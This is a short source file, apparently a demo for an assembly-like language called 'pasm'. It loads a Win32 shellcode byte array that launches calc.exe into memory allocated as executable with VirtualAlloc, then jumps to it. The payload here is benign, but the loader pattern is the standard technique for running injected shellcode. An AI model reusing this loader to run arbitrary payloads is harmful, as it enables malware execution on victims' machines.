34 lines
1.6 KiB
Plaintext
34 lines
1.6 KiB
Plaintext
; Program that demonstrate the execution of a shellcode using pasm (using a Win32 calc.exe shellcode)
|
|
|
|
set arr 0x31, 0xc9, 0xf7, 0xe1, 0x64, 0x8b, 0x41, 0x30, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x14, 0xad, 0x96, 0xad, 0x8b, 0x58, 0x10, 0x8b, 0x53, 0x3c, 0x01, 0xda, 0x8b, 0x52, 0x78, 0x01, 0xda, 0x8b, 0x72, 0x20, 0x01, 0xde, 0x31, 0xc9, 0x41, 0xad, 0x01, 0xd8, 0x81, 0x38, 0x47, 0x65, 0x74, 0x50, 0x75, 0xf4, 0x81, 0x78, 0x0a, 0x72, 0x65, 0x73, 0x73, 0x75, 0xeb, 0x8b, 0x72, 0x24, 0x01, 0xde, 0x66, 0x8b, 0x0c, 0x4e, 0x49, 0x8b, 0x72, 0x1c, 0x01, 0xde, 0x8b, 0x14, 0x8e, 0x01, 0xda, 0x89, 0xd5, 0x31, 0xc9, 0x68, 0x73, 0x41, 0x61, 0x61, 0x66, 0x81, 0x6c, 0x24, 0x02, 0x61, 0x61, 0x68, 0x6f, 0x63, 0x65, 0x73, 0x68, 0x74, 0x65, 0x50, 0x72, 0x68, 0x43, 0x72, 0x65, 0x61, 0x54, 0x53, 0xff, 0xd2, 0x31, 0xc9, 0xb1, 0xff, 0x31, 0xff, 0x57, 0xe2, 0xfd, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x89, 0xe1, 0x51, 0x51, 0x31, 0xd2, 0x52, 0x52, 0x52, 0x52, 0x52, 0x52, 0x51, 0x52, 0xff, 0xd0, 0x83, 0xc4, 0x10, 0x68, 0x65, 0x73, 0x73, 0x61, 0x66, 0x83, 0x6c, 0x24, 0x03, 0x61, 0x68, 0x50, 0x72, 0x6f, 0x63, 0x68, 0x45, 0x78, 0x69, 0x74, 0x54, 0x53, 0xff, 0xd5, 0x31, 0xc9, 0x51, 0xff, 0xd0
|
|
|
|
main:
|
|
push 64 ; flprotect (PAGE_EXECUTE_READWRITE)
|
|
push 12288 ; alloctype (MEM_COMMIT | MEM_RESERVE)
|
|
push 176 ; size
|
|
push 0 ; address
|
|
call VirtualAlloc
|
|
|
|
mov a4, eax ; copy of address
|
|
mov a1, eax ; address
|
|
mov a3, arr
|
|
mov a2, 0 ; count
|
|
memcpy:
|
|
cmp a2, 176
|
|
jne 1
|
|
jmp 6 ; jmp out of memcpy
|
|
mov *a1, *a3
|
|
add a1, 1
|
|
add a3, 8
|
|
add a2, 1
|
|
jmp memcpy
|
|
|
|
push a4
|
|
call CallRawAddress
|
|
|
|
memcpy_end:
|
|
push 32768 ; free type (MEM_RELEASE)
|
|
push 0 ; size (all)
|
|
push a4 ; address
|
|
call VirtualFree
|
|
end |